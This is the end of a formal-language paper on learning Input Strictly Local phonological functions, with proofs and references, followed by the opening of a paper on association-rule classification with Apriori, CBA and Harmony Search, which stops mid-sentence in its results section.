S = S′ ∪S′′, where • S′ = {(w,w′) | [w ∈ Σ≤k ∧f(w) = w′]} • S′′ = {(wa,w′′) | a ∈ Σ, [w ∈ Σk ∧ Suffk−1(w) ∈ Q′ ∧f(wa) = w′′]}. 499 Lemma 2 (Convergence). A seed for an ISL func- tion f is a characteristic sample for ISLFLA. Proof. We show that for any ISL function f and a dataset D that contains a seed S the output of the ISLFLA is T ISLf . Let PTT(D) = (QPTT ,q0P T T , Σ, Γ,δPTT , σPTT ) be the input to the ISLFLA and T = (QT ,q0T , Σ, Γ,δT ,σT ) be its output. First we show that QT = Σ≤k−1. By Definitions 4 and 8, Σ≤k−1 ⊆ QPTT . Since the ISLFLA only merges states with the same (k− 1)-length suffix, Σ≤k−1 ⊆ QT . Since it does not exit until all states q have been merged with Suffk−1(q), QT = Σ≤k−1. Next we show that given S, the algorithm will never need to merge two states q1 and q2 such that δ1(q1, #) 6= δ1(q2, #). Let δ1(q1, #) = z, and δ1(q2, #) = x with z 6= x and q1 = Suffk−1(q2). By Definition 2, tailsf (q1) = tailsf (q2), so if z 6= x it must be the case that q2 does not have tran- sitions for all a ∈ Σ. This is because the only way for the output strings of the outgoing transitions of q2 to differ from those of q1 is if fewer transitions were present on q2 when the PTT was made onward. (By definition of S we know q1 has transitions for all a ∈ Σ.) But since tailsf (q1) = tailsf (q2), we also know that z = ux for some u ∈ Γ∗. By Definition 8, all states up to length k have tran- sitions for all a ∈ Σ; therefore, |q2| ≥ k + 1. This means ∃q′ ∈ Σk between q1 and q2, which will be merged with some other state before q2 will. This merge will cause non-determinism, which in turn will trigger pushback and cause u to move further down the branch toward q2. By extension there will be |q2|−k states between q1 and q2, each of which will be merged, triggering pushback of u, so that by the time q1 and q2 are merged, δ1(q2, #) = ux = z = δ1(q2, #). Thus, all non-determinism can be removed, and so T is subsequential. It remains to show that ∀q ∈ QT ,a ∈ Σ, δ2(q,a) = Suff k−1(qa). Since state merging pre- serves transitions, this follows from the construction of PTT(D). By Theorem 3, T = T ISLf . Next we establish complexity bounds on the run- time of the ISLFLA and the size of the characteristic sample for ISL functions. We observe that both of these bounds improve the bounds of OSTIA. While not surprising, since ISL functions are less general than subsequential functions, the result is important since it is an example of greater a priori knowledge enabling learning with less time and data. Let m be the length of the longest output string in the sample and let n denote the number of states of the PTT; n is at most the sum of the lengths of the input strings of the pairs in the sample. Lemma 3 (Polynomial time). The time complexity of the ISLFLA is in O(n ·m ·k · |Σ|). Proof. First, making the PTT onward can be done in O(m · n): it consists of a depth-first parsing of the PTT from its root, with a computation at each state of the lcp of the outgoing transition outputs after the recursive computation of the function (see de la Higuera (2010), Chap. 18, for details). As the com- putation of the lcp takes at most m steps, and as it has to be done for each state, the complexity of this step is effectively in O(m ·n). For the two loops, we need to find a bound on the number of merges that can occur. States q such that |q| < k do not yield any merges in the outer loop. All other states q′ are merged with Suffk−1(q), in the outer loop or in the inner one. The number of merges is thus bounded by n. Computing the suffix of length (k − 1) of any word can be done in O(k) with a correct implementation of strings of charac- ters. The test of the inner loop can be done in con- stant time and so can the merge and pushback pro- cedures. After each merge, the test of the inner loop needs to be done at most |Σ| times. As computing the lcp has a complexity in O(m), the overall com- plexity of the two loops is in O(n ·m ·k · |Σ|). The overall complexity of the algorithm is thus O(m ·n + n ·m ·k · |Σ|) = O(n ·m ·k · |Σ|). Let T ISLf = (Q,q0, Σ, Γ,δ,σ) be a target trans- ducer. We define m = max{|u| | (q,a,u,q′) ∈ δ}, n = |Q|, and p = max {|v| | (q, #,v) ∈ σ}. Lemma 4 (Polynomial data). The size of the charac- teristic sample is in O(n·|Σ|·k·m+n2·m+n·|Σ|·p). Proof. The first item of the seed, S′, covers all and only the states of the target: the left projection of these pairs is thus linear in n and every right projec- tion is at most n · m + p. Thus the size of S′ is at most n · (n + n ·m + p) = O(n2 ·m + n ·p). Concerning the second part, S′′, its cardinality is at most n · |Σ| (in the rare case where Q′ = Q). 500 Each element of the left projection of S′′ is of length (k + 1) and each element of its right projection is at most of length (k + 1)·m+p. The size of S′′ is thus in O(n · |Σ| · (k ·m + p)). Therefore, the size of the characteristic sample is in O(n·|Σ|·k·m+n2·m+n·|Σ|·p), which is clearly polynomial in the size of the target transducer. Theorem 8. The ISLFLA identifies the class of ISL functions in polynomial time and data. Proof. Immediate from Lemmas 2, 3, and 4. 5.3 Demonstrations We tested the ISLFLA with the three examples in §4, as well as the English flapping process (t → R / V́ V). For each case, a data set was constructed according to Definition 8 using the alphabets pre- sented in §4. The alphabet for English flapping was {V́, V, t, ?}. The value of k is 2 for final devoicing, @-epenthesis, and fricative deletion and 3 for English flapping. A few additional data points of length 5 or 6 were also added to make the data set a superset of the seed. In all four cases, the learner returned the correct T ISLf . The decision to use artificial corpora in these demonstrations was motivated by the fact that the sample in Definition 8 will not be present in a natural language corpus. That sample includes all possible sequences of symbols from the alphabet of a given length, whereas a natural language corpus will re- flect the language-particular restrictions against cer- tain segment sequences (i.e., phonotactics). As discussed in the introduction, Gildea and Ju- rafsky (1996) address this issue with natural lan- guage data by equipping OSTIA with a community bias, whereby segments belonging to a natural class (i.e., stops, fricatives, sonorants) are expected to be- have similarly, and a faithfulness bias, whereby seg- ments are assumed to be realized similarly on the surface. In our demonstrations we put aside the is- sue of the behavior of segments in a natural class by using abbreviated alphabets (e.g., T for all voiceless stops). But if in fact knowledge of natural classes precedes the learning of phonological processes, the use of such an alphabet is appropriate. In future developments of the ISLFLA we like- wise aim to accommodate natural language data, but in a way that maintains the theoretical result of identification in the limit. The restrictions on seg- ment sequences represented in natural language data amount to ‘missing’ transitions in the initial prefix tree transducer that is built from that data. In other words, the transducer represents a partial, not a to- tal function. Thus it seems the approach of Oncina and Varò (1996) and Castellanos et al. (1998) could be very instructive, as their use of domain informa- tion enabled OSTIA to learn partial functions. In our case, the fact that the domain of an ISL function is an SL language could provide a means of ‘filling in’ the missing transitions. The details of such an approach are, however, being left for future work. 6 Conclusion This paper has defined Input and Output Strictly Local functions, which synthesize the properties of subsequential transduction and Strictly Local formal languages. It has provided language-theoretic char- acterizations of these functions and argued that they can model many phonological and morphological processes. Lastly, an automata-theoretic character- ization of ISL functions was presented, along with a learning algorithm that efficiently learn this class in the limit from positive data. Current work includes developing a comparable automata characterization and learning algorithm for OSL functions, as well as defining additional func- tional classes to model those phonological processes that cannot be modeled with ISL or OSL functions. The SL languages are just one region of a subregu- lar hierarchy of formal languages (McNaughton and Papert, 1971; Rogers and Pullum, 2011; Rogers et al., 2013). The ISL and OSL functions defined here are the first step in developing a corresponding hi- erarchy of subregular functions. Of immediate in- terest to phonology are functional counterparts for the Tier-Based Strictly Local and Strictly Piecewise language classes, which have been shown to model long-distance phonotactics (Heinz, 2010; Heinz et al., 2011). Such functions might be useful for mod- eling the long-distance processes that repair viola- tions of these phonotactic constraints. Acknowledgements We thank Adam Jardine, Jim Rogers, and the three anonymous reviewers for helpful comments. This research was supported by NSF CPS#1035577. 501 References Dana Angluin. 1982. Inference of reversible languages. Journal for the Association of Computing Machinery, 29(3):741–765. Kenneth R. Beesley and Lauri Karttunen. 2003. Finite State Morphology. Center for the Study of Language and Information. William Bennett. 2013. Dissimilation, Consonant Har- mony, and Surface Correspondence. Ph.D. thesis, Rut- gers University. Antonio Castellanos, Enrique Vidal, Miguel A. Varó, and José Oncina. 1998. Language understanding and sub- sequential transducer learning. Computer Speech and Language, 12:193–228. Jane Chandlee and Jeffrey Heinz. 2012. Bounded copy- ing is subsequential: implications for metathesis and reduplication. In Proceedings of SIGMORPHON 12. Jane Chandlee and Adam Jardine. 2014. Learn- ing phonological mappings by learning Strictly Local functions. In John Kingston, Claire Moore-Cantwell, Joe Pater, and Robert Staubs, editors, Proceedings of the 2013 Meeting on Phonology. LSA. Jane Chandlee and Cesar Koirala. 2014. Learning local phonological rules. In Proceedings of the 37th Penn Linguistics Conference. Jane Chandlee, Angeliki Athanasopoulou, and Jeffrey Heinz. 2012. Evidence for classifying metathesis patterns as subsequential. In The Proceedings of the 29th West Coast Conference on Formal Linguistics, Somerville, MA. Cascadilla. Jane Chandlee. 2014. Strictly Local Phonological Pro- cesses. Ph.D. thesis, University of Delaware. Noam Chomsky and Morris Halle. 1968. The Sound Pattern of English. Harper & Row, New York. Colin de la Higuera. 1997. Characteristic sets for poly- nomial grammatical inference. Machine Learning, 27(2):125–138. Colin de la Higuera. 2010. Grammatical Inference: Learning Automata and Grammars. Cambridge Uni- versity Press. Brian Gainor, Regine Lai, and Jeffrey Heinz. 2012. Computational characterizations of vowel harmony patterns and pathologies. In The Proceedings of the 29th West Coast Conference on Formal Linguistics, pages 63–71, Somerville, MA. Cascadilla. Daniel Gildea and Daniel Jurafsky. 1996. Learning bias and phonological-rule induction. Computational Lin- guistics, 22(4):497–530. E. Mark Gold. 1967. Language identification in the limit. Information and Control, 10:447–474. Gunnar Hansson. 2001. Theoretical and Typological Is- sues in Consonant Harmony. Ph.D. thesis, University of California, Berkeley. Jeffrey Heinz and Regine Lai. 2013. Vowel harmony and subsequentiality. In Andras Kornai and Marco Kuhlmann, editors, Proceedings of the 13th Meeting on the Mathematics of Language (MoL 13), pages 52– 63. Jeffrey Heinz, Chetan Rawal, and Herbert G. Tanner. 2011. Tier-based Strictly Local constraints for phonol- ogy. In Proceedings of the 49th Annual Meeting of the Association for Computational Linguistics, pages 58– 64. Association for Computational Linguistics. Jeffrey Heinz. 2007. The Inductive Learning of Phono- tactic Patterns. Ph.D. thesis, University of California, Los Angeles. Jeffrey Heinz. 2009. On the role of locality in learning stress patterns. Phonology, 26:303–351. Jeffrey Heinz. 2010. Learning long-distance phonotac- tics. Linguistic Inquiry, 41:623–661. Mans Hulden, Iñaki Alegria, Izaskun Etxeberria, and Montse Maritxalar. 2011. Learning word-level dialec- tal variation as phonological replacement rules using a limited parallel corpus. In Proceedings of the First Workshop on Algorithms and Resources for Modelling of Dialects and Language Varieties, DIALECTS ’11, pages 39–48. Association for Computational Linguis- tics. Mans Hulden. 2009. Finite-State Machine Construction Methods and Algorithms for Phonology and Morphol- ogy. Ph.D. thesis, University of Arizona. Adam Jardine. 2013. Tone is (computationally) differ- ent. Unpublished manuscript, University of Delaware. C. Douglas Johnson. 1972. Formal Aspects of Phonolog- ical Description. The Hague, Mouton. Brian D. Joseph and Irene Philippaki-Warburton. 1987. Modern Greek. Croom Helm, Wolfeboro, NH. Ronald M. Kaplan and Martin Kay. 1994. Regular mod- els of phonological rule systems. Computational Lin- guistics, 20:371–387. Huan Luo. 2013. Long-distance consonant harmony and subsequentiality. Unpublished manuscript, University of Delaware. Robert McNaughton and Seymour A. Papert. 1971. Counter-Free Automata. MIT Press. Mehryar Mohri. 1997. Finite-state transducers in lan- guage and speech processing. Computational Linguis- tics, 23:269–311. José Oncina and Pedro Garcı́a. 1991. Inductive learning of subsequential functions. Technical Report DSIC II- 34, University Politécnia de Valencia. José Oncina and Miguel A. Varò. 1996. Using do- main information during the learning of a subsequen- tial transducer. Lecture Notes in Computer Science - Lecture Notes in Artificial Intelligence, pages 313– 325. 502 José Oncina, Pedro Garcı́a, and Enrique Vidal. 1993. Learning subsequential transducers for pattern recog- nition interpretation tasks. IEEE Transactions on Pat- tern Analysis and Machine Intelligence, 15(5):448– 457. Amanda Payne. 2013. Dissimilation as a subsequen- tial process. Unpublished manuscript, University of Delaware. Alan Prince and Paul Smolensky. 1993. Optimality Theory: Constraint interaction in generative gram- mar. Technical Report 2, Rutgers University Center for Cognitive Science. Jason Riggle. 2003. Non-local reduplication. In Pro- ceedings of the 34th Annual Meeting of the North East- ern Linguistic Society. James Rogers and Geoffrey K. Pullum. 2011. Aural pat- tern recognition experiments and the subregular hier- archy. Journal of Logic, Language and Information, 20:329–342. James Rogers, Jeffrey Heinz, Margaret Fero, Jeremy Hurst, Dakotah Lambert, and Sean Wibel. 2013. Cog- nitive and sub-regular complexity. In Glyn Morrill and Mark-Jan Nederhof, editors, Formal Grammar, Lec- ture Notes in Computer Science, volume 8036, pages 90–108. Springer. Sharon Rose and Rachel Walker. 2004. A typology of consonant agreement as correspondence. Language, 80:475–531. Keiichiro Suzuki. 1998. A Typological Investigation of Dissimilation. Ph.D. thesis, University of Arizona. Natasha Warner, Allard Jongman, Anne Cutler, and Doris Mücke. 2001. The phonological status of Dutch epenthetic schwa. Phonology, 18:387–420. 503 504 work_hb5h33a6xnd2ngkrgel4i6p7i4 ---- Submitted 17 December 2018 Accepted 30 March 2019 Published 18 November 2019 Corresponding author Ramak Ghavamizadeh Meibodi, r-ghavami@sbu.ac.ir Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 11 DOI 10.7717/peerj-cs.188 Copyright 2019 Hasanpour et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Improving rule-based classification using Harmony Search Hesam Hasanpour, Ramak Ghavamizadeh Meibodi and Keivan Navi Department of Computer Science and Engineering, Shahid Beheshti University, Tehran, Iran ABSTRACT Classification and associative rule mining are two substantial areas in data mining. Some scientists attempt to integrate these two field called rule-based classifiers. Rule-based classifiers can play a very important role in applications such as fraud detection, medical diagnosis, etc. Numerous previous studies have shown that this type of classifier achieves a higher classification accuracy than traditional classification algorithms. However, they still suffer from a fundamental limitation. Many rule-based classifiers used various greedy techniques to prune the redundant rules that lead to missing some important rules. Another challenge that must be considered is related to the enormous set of mined rules that result in high processing overhead. The result of these approaches is that the final selected rules may not be the global best rules. These algorithms are not successful at exploiting search space effectively in order to select the best subset of candidate rules. We merged the Apriori algorithm, Harmony Search, and classification- based association rules (CBA) algorithm in order to build a rule-based classifier. We applied a modified version of the Apriori algorithm with multiple minimum support for extracting useful rules for each class in the dataset. Instead of using a large number of candidate rules, binary Harmony Search was utilized for selecting the best subset of rules that appropriate for building a classification model. We applied the proposed method on a seventeen benchmark dataset and compared its result with traditional association rule classification algorithms. The statistical results show that our proposed method outperformed other rule-based approaches. Subjects Artificial Intelligence, Data Mining and Machine Learning Keywords Apriori algorithm, CBA algorithm, Harmony Search INTRODUCTION The availability of a huge amount of raw data has created an immense opportunity for knowledge discovery and data mining research to play an essential role in a wide range of applications such as industry, financial forecasting, weather forecasting and healthcare. Classification is one of the most important areas in data mining that has applied in many applications such as bioinformatics, fraud detection, loan risk prediction, medical diagnosis, weather prediction, customer segmentation, target marketing, text classification and engineering fault detection. Association Rule Mining (ARM) is another popular and substantial technique in machine learning and data mining that introduced by Agrawal, Imieliński & Swami (1993), and since that remained one of the most active research areas in machine learning and knowledge discovery. Association rule mining finds interesting relationships among large sets of data items. Association rules show attribute value How to cite this article Hasanpour H, Ghavamizadeh Meibodi R, Navi K. 2019. Improving rule-based classification using Harmony Search. PeerJ Comput. Sci. 5:e188 http://doi.org/10.7717/peerj-cs.188 https://peerj.com/computer-science mailto:r-ghavami@sbu.ac.ir mailto:r-ghavami@sbu.ac.ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.188 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.188 conditions that occur frequently together in a given data set. Association rules provide information of this type in the form of if-then statements. Unlike the if-then rules of logic, association rules are intrinsically probabilistic and are computed from the data. The ARM is a powerful exploratory technique with a wide range of applications including marketing policies, medical domain (Ilayaraja & Meyyappan, 2013; Shin et al., 2010), financial forecast, credit fraud detection (Sarno et al., 2015) and many other areas. There are a number of famous association rule mining algorithms that are accessible to researchers (Agrawal, Imieliński & Swami, 1993; Burdick, Calimlim & Gehrke, 2001; Scheffer, 2001a). There is some evidence that integration benefits of classification and association rule mining together can result in more accurate and efficient classification models than traditional classification algorithms (Ma & Liu, 1998). Producing concise and accurate classifier by utilizing association rule mining is one of the attractive domain for data mining and machine learning researchers. A typical associative classification system is constructed in two stages: 1. discovering all the association rules inherent in a database. 2. Selecting a small set of relevant association rules to construct a classifier. In the first step, some algorithms use Apriori algorithm for rule generation and some other algorithms use other approaches such as FOIL (First Order Inductive Learner). Mazid, Ali & Tickle (2009) compared the performance between the rule-based classification and association rule mining algorithm based on their classification performance and computational complexity. They concluded that Apriori is a better choice for rule-based mining task in terms of accuracy and computational complexity. Usually a lot of rules are generated in the first step and the main issue on second step is that how to efficiently find out a small number of high-quality rules and how to generate a more accurate classifier. It must be noted that some researchers focus on the first step and try to find a minimal class association rule set (Li, Shen & Topor, 2002), but our focus is on the second step. Traditional algorithms use greedy approaches for selecting a small subset of generated rules for building a classifier. By using this approach, the selected rules are not the best subset of possible rules. Another challenge is that the resulted rules bias to prevalent classes and classification the rare instances is a major problem. consequently, test samples belonging to the small classes are misclassified as prevalent classes (Chen, Hsu & Hsu, 2012; Sun, Wong & Kamel, 2009). Sometimes rules with low support and very high confidence are effective in identifying rare events. In this paper, we present an association rule-based classification method to obtain an accurate and compact rule-based classifier. We used the Apriori algorithm for rule generation and Harmony Search for selecting the best subset of rules that can build a classifier. The plan of this paper is as follows: at first, we present the necessary information related to rule-based classification. In the next section, we describe the proposed method. The Results section shows the induced results and, finally, the Discussion section concludes the study. Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 2/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.188 PRELIMINARIES Apriori algorithm and interesting measures Apriori is a standard and well-known basic algorithm in association rule mining that is used for mining frequent itemsets in a set of transactions. It was first introduced by Agrawal and Srikant (Agrawal, Imieliński & Swami, 1993). The APRIORI-C is another Apriori-based algorithm that drives rules according to the parameters minimal confidence and minimal support of a rule (Jovanoski & Lavrač, 2001). Predictive Apriori (Scheffer, 2001b) in another algorithm motivated by Apriori and unlike the confidence related focus of Apriori tries to maximizes the expected accuracy of an association rule on unseen data. While Apriori sorts the rules based on confidence only, Predictive Apriori considers both the confidence and support in ranking the rules. Nahar et al. considered three rule generation algorithms—Apriori, Predictive Apriori and Tertius- for extraction the meaningful factors for particular types of cancer (Nahar et al., 2011) and heart disease (Nahar et al., 2013). Their experimental results showed that Apriori is the most beneficial association rule mining algorithm. Apriori algorithm can produce a lot of rules, but much of them are superfluous. To select appropriate rules from the set of all possible rules, constraints on various measures of interestingness can be used. Support and confidence are two measures of rule interestingness that mirror the usefulness and certainty of a rule respectively (Agrawal et al., 1996). The support is the percentage of the total number of records of transactions that include all items in the antecedent (if) and consequent (then) parts of the rule. Frequent itemsets are those itemsets that their frequency is greater than a predefined minimum support (Minsup). Confidence is the ratio of the number of transactions that include all items in the consequent, as well as the antecedent (the support) to the number of transactions that include all items in the antecedent. In other words, confidence is the accuracy of the rule and usually is used in Apriori for ranking the rules. The task of association rule mining is to generate all association rules from the set of transactions that have a support greater than Minsup and confidence greater than Mincon. Since we need to discover the relationship between input attributes and class label, we need to find all the rules of the form A → B that antecedent part of the rule includes of some item and the consequent part can just be the class items. High support and high confidence rules are not necessarily interesting. Instead of using only support and confidence, we also used lift measure as a metric for evaluating the significance and reliability of association rules. Lift is the ratio of Confidence to Expected Confidence. Hence, Lift is a value that gives us information about the increase in the probability of the consequent given antecedent part of a rule. A lift ratio larger than 1.0 implies that the relationship between the antecedent and the consequent is more significant than would be expected and make those rules potentially useful for predicting the consequent in unseen instances. The larger the lift ratio, the more significant the association. Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 3/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.188 Support(X H⇒Y)=P(X∩Y) (1) Confidence(X H⇒Y)=P(Y |X)= Support(X∩Y ) Support(X) (2) Lift(X,Y)= P(X∩Y ) P(x)∗P(Y ) . (3) Another issue that must be considered is related to the type of dataset that is appropriate for applying the Apriori algorithm. Consider a dataset for supervised learning which contains observations of a class label variable and a number of predictor variables. Such a dataset can be converted into an appropriate format for association rule mining if both the class label and the predictors are of the categorical type. Since our benchmark datasets contain continuous variables, we must use a method for handling numeric attributes. There are some methods for this purpose. A traditional method is discretization that can be static or based on the distribution of data. We used a method proposed by Tsai, Lee & Yang (2008). Associative rules for classification In recent years, some researchers tried to combine association rule mining and classification (Cano, Zafra & Ventura, 2013; Li, Han & Pei, 2001; Ma & Liu, 1998; Wang, Zhou & He, 2000; Wang & Wong, 2003; Yin & Han, 2003). Their experiments show that this approach achieves better accuracy than conventional classification algorithms such as C4.5. The reason is that the associative classifier is composed of high-quality rules, which are generated from highly confident event associations that reflect the close dependencies among events. The Classification Based on Association rules (CBA) algorithm is one of the first efforts for combining of classification and association rule mining (Ma & Liu, 1998). This algorithm will describe with details in the next section. Li, Han & Pei (2001) suggested a weighted χ2 analysis to perform a Classification based on Multiple Association Rules (CMAR). Unlike the CBA algorithm, the CMAR algorithm uses all the rules that cover the example to be classified instead of using just one rule. Yin & Han (2003) propose the CPAR (Classification based on Predictive Association Rules) rule-based classification algorithm CPAR doesn’t generate a large number of candidate rules as in conventional associative classification. It pursues a greedy algorithm to produce rules directly from training data and uses the best K rules in prediction time. An advantage of associative classifiers is that they are rule-based and thus lend themselves to be more easily understood by humans. As previously stated, a classification system is built in two phase. In the first stage, the learning target is to discover the association patterns inherent in a database (also referred to as knowledge discovery). In the second stage, the goal is to select a small set of relevant association patterns to construct a classifier given the predictor attributes. To produce the best classifier out of the entire set of rules, we need to consider all the feasible subsets of rules and selecting the most accurate subset. This is clearly impractical. Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 4/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.188 In the classification phase, some methods such as (Ma & Liu, 1998; Thabtah, Cowling & Peng, 2004; Wang, Zhou & He, 2000), simply select a rule with a maximal user-defined measure, such as confidence. If there is no rule covering the example, then usually the prevalent class is taken to be the predicted class. However, identifying the most effective rule at classifying a new case is a big challenge. When classifying a new data object, it may have more rules that satisfy the test conditions and using them may increase the prediction accurately (Li, Han & Pei, 2001). CBA algorithm Classification Based on Associations (CBA) algorithm is one of the first algorithms to bring up the idea of classification using association rules (Ma & Liu, 1998). CBA implements the famous Apriori algorithm (Agrawal, Imieliński & Swami, 1993) in order to discover frequent items. Once the discovery of frequent items finished, CBA proceeds by converting any frequent item that passes the Minconf into a rule in the classifier. At the rule generation phase, CBA selects a special subset of association rules whose right-hand-side are restricted to the classification class attribute. This subset of rules is called class association rules (CARs). At the next step, the CBA algorithm builds a classifier using CARs. At this step, CBA uses a heuristic approach and sorts the rules according to their confidence and selects top rules that cover the training samples. The algorithm first selects the best rule (rule having the highest confidence), then eliminates all the covered examples. If at least one example satisfied the rule conditions, then that rule is appended to the final rules. This procedure is repeated until there are no more rules to select or there are no more examples to cover. The algorithm then stops and returns the classifier in the form of an IF-THEN-ELSE rule list. One challenge with this approach is that selecting the best rules may be not the best subset of rules. The CBA system follows the original association rule model and uses a single Minsup in its rule generation. It seems that this is inadequate for mining of CARs because class frequency distributions in many practical classification datasets is unbalanced. We used the CBA algorithm with three little changes. The first change is that we use multiple Minsup than can be useful for imbalanced datasets. The second change is that in the original CBA algorithm once each sample is covered by a rule, it is removed from the samples; we defined a parameter called Delta. This parameter defined that how many times each sample must be covered to remove from the samples (Li, Han & Pei, 2001). This approach leads to the generation of more rules. The third change occurs in the classification phase. In the classification phase of the original CBA algorithm, the rule with maximum confidence that covers the test conditions defines the class label of a test sample. We select the top K (a predefined parameter) rules from each class that covers the test sample conditions and determined the class label according to the sum of the confidence of selected rules. All data preprocessing and analyse were conducted using Matlab version 2014a (The MathWorks Inc., Natick, MA, USA). Proposed method The proposed method of rule selection based on HS are depicted in Fig. 1. At the initial step, we did some preprocessing on each dataset. One of the main preprocessing is discretization Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 5/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.188 1 Training data Discretization Convert to appropriate format Apply Apriori algorithm Harmony search Classification using selected rules Test data Apply CBA algorithm Figure 1 The framework of the proposed method. This figure shows what steps must be done for imple- mentation of the proposed method. Full-size DOI: 10.7717/peerjcs.188/fig-1 of continuous features. We applied a discretization algorithm based on a class-attribute contingency coefficient that was proposed by Tsai, Lee & Yang, (2008). After discretization, we convert each dataset to the appropriate format such that the value of each feature can be True (1) or False (0). For this aim, if a feature is converted to N different discrete values, we produce N feature. After the conditions are satisfied for the Apriori algorithm, we run this algorithm for each class with different Minsup and Minconf. The main novelty of our study is in the next step. As previously was mentioned, the Apriori algorithm produces many rules and CBA algorithm uses a greedy algorithm for selecting a subset of produced Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 6/14 https://peerj.com https://doi.org/10.7717/peerjcs.188/fig-1 http://dx.doi.org/10.7717/peerj-cs.188 rules for building a classifier. Using greedy approaches cause the selected rules to not be the best subset of rules. We believe that population-based evolutionary algorithms fit well to the rule selection problem. Harmony Search (HS) is a population-based stochastic search algorithm that inspired by the musical process of searching for a perfect state of harmony (Geem, Kim & Loganathan, 2001). The harmony in music is analogous to the optimization solution vector, and the musician’s improvisations are similar to local and global search methods in optimization techniques When a musician is improvising, he has three choices: (1) to execute any pitch from memory; (2) to execute a pitch next to any other in his memory; (3) to execute a random pitch from the range of all possible pitches. These three options are employed in the HS algorithm by means of three main parameters: Harmony Memory (HM), Harmony Memory Consideration Rate (HMCR), and Pitch Adjustment Rate (PAR). The HMCR is defined as the probability of selecting a component from the present HM members. The PAR determines the probability of a candidate from the HM to be mutated. The steps in the procedure of HS are as follows: Step 1. Initialize a harmony memory (HM). The initial HM consists of a given number of randomly generated solutions to the optimization problems under consideration. Step 2. Improvise a new harmony from HM. Step 3. Update the HM. If the new harmony is better than the worst harmony in HM, then include the new harmony in the HM and exclude the worst harmony from the HM. Step 4. If the stopping criteria we not satisfied, go to step 2. HS has been successfully applied to various discrete optimization problems such as Maximum Clique Problem (Afkhami, Ma & Soleimani, 2013), traveling salesperson problem (Geem, Kim & Loganathan, 2001), tour routing (Geem, Tseng & Park, 2005), water network design (Geem, 2006), dynamic relocation of mobile base stations in wireless sensor networks (Moh’d Alia, 2017), and others. In binary HS, the size of each solution equals the number of candidate’s rules. For example, if the Apriori algorithm produces 100 rules that satisfy Minsup and Minconf conditions then the size of each solution in HS will be equal to 100. Each solution consists of a binary vector of rule incidences, indicating exclusion (0) or inclusion (1) of the rule in the combination. The standard Harmony Search (HS) is not suitable for binary representations. This is due to the pitch adjusting operator not being able to perform the local search in the binary space. Therefore we used the implementation of HS that proposed by Afkhami, Ma & Soleimani (2013). We run the HS algorithm with the following parameters: maximum number of iterations = 20, harmony memory size = 100, Number of new harmonies = 20, harmony memory consideration rate = 0.75. We used Harmony Search, a music-inspired stochastic search algorithm, for selecting the best subset of rules as a classifier. One of the important section in any meta-heuristic algorithm is the calculation of cost function. For this aim, we apply a modified version of the CBA algorithm on the selected rules and calculate the error rate of applying the resulted rules on the training and validation data. At final, the solution with the minimum Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 7/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.188 Table 1 Pseudo code of the proposed method. This pseudo code supposes that we have training input, training output, test input, validation input and validation output. The code shows that how we build a rule-based classifier and determine the test data output. For i=1 to K fold Determine Traininput, Trainoutput, Testinput, Testoutput, Valinput and Valoutput Finalrules={}; For j=1 to number_class Rulesj= apply Apriori algorithm(traininput, Minsupj,Minconj,class j ) Finalrules= append Rulesj to Finalrules End %for j Selected_rules=Apply harmony search algorithm (Finalrules, Traininput, Trtainoutput, Valinput, Valoutput) Testoutput= apply selected_rules on Testinput End %for i cost value is selected and this solution (a subset of rules) applies on the test data. It is obvious that the proposed flowchart is shown for one fold of cross-validation. In K-fold cross-validation, this approach must be repeated for K times, until all the samples in the dataset are used for the test data. The pseudo code of the proposed method is shown in Table 1. Time complexity of the Apriori algorithm and association rule mining is a critical challenge that must be considered (Cano, Luna & Ventura, 2013; Cano, Zafra & Ventura, 2014; Luna et al., 2016; Thabtah, Cowling & Hammoud, 2006). As its time complexity is exponential, we can do some preprocessing activity to decrease the running time. First of all, we can apply feature selection before applying Apriori algorithm. Feature selection can be done before or after of discretization. The second thing that we can do is related to the size of the rules. As small rules are favorable, we can limit the size of items that appear in a rule and consequently decrease the running time of Apriori algorithm. RESULTS We applied the proposed method on seventeen benchmark dataset and compare its result with traditional association rule classification algorithms. We compared our proposed method with the CPAR, CBA and C4.5 algorithms that are famous in rule-based classification (Ma & Liu, 1998; Quinlan, 1993; Yin & Han, 2003) The characteristic of the used datasets are shown in Table 2. We selected datasets with a verity of size in samples, attributes and number of classes. To run the experiments, a stratified five-fold cross-validation was used to produce a reliable accuracy. Cross-validation is a standard evaluation measure for calculating error rate on data in machine learning. At each run, we split each dataset to five parts, three part for training, one part for validation and one part for testing. To increase reliability, the experiments for each dataset have been repeated 10 times and the average of results were reported. Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 8/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.188 Table 2 Description of used datasets. Each row shows the specifications of a used dataset including the name of the dataset, the number of features, the number of classes and distribution of classes. id Dataset # of Data items # of features # of class distribution 1 Iris 150 4 3 50–50–50 2 Galaxy 323 4 7 51–28–46–38–80–45–35 3 Wine 178 13 3 59–71–48 4 Tictactoe 958 9 2 626–332 5 SAHeart 462 9 2 160–302 6 Car 1,728 6 4 1,210–384–65–69 7 Breast cancer 699 19 2 458–241 8 Yeast 1,484 8 10 244–429–463–44–35–51–163 –30–20–5 9 Balance scale 625 4 3 49–288–288 10 lymphography 148 18 4 2–81–61–4 11 Haberman 306 3 2 225–81 12 Mammographic 830 5 2 427–403 13 phoneme 5,404 5 2 3,818–1,586 14 Pima 768 8 2 267–500 15 German 1,000 20 2 700–300 16 Monks-2 432 6 2 142–290 17 Monks-3 432 6 2 228–204 The result of the proposed method is shown in Table 3. As the results show, at four dataset decision tree gain the best 